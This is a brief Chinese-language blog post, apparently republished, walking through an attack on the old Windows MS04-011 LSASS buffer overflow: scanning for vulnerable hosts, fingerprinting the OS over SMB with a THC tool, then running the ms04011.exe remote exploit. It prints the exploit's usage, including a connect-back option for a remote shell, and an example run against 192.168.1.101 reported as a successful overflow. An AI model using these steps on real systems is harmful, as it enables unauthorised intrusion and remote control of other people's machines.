缓冲区溢出漏洞 ms04011

DSScan使用
扫描目标主机是否存在ms04011漏洞
1
getos使用
获取操作系统类型

> getos.exe 192.168.1.101

-------------------------------------------------------
 THCsmbgetOS v0.1 - gets group, server and os via SMB
       by Johnny Cyberpunk (jcyberpunk@thc.org)
-------------------------------------------------------

[*] Connecting Port 139....
[*] Sending session request....
[*] Sending negotiation request....
[*] Sending setup account request....
[*] Successful....

Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1

ms04011使用

//帮助
> ms04011.exe
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit
            bug discoveried by eEye,
            code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.
            Usage:
            ms04011.exe 0 targetip (Port ConnectBackIP )
                         ---->  attack 2k (tested on cn sp4,en
            ms04011.exe 1 targetip (Port ConnectBackIP )
                         ---->  attack xp (tested on cn sp1)

//举例
> ms04011.exe 1 192.168.1.101
shellcode size 404
Ret value = 1726    //1726代表溢出成功
原文地址:https://www.cnblogs.com/zhangxuechao/p/11709463.html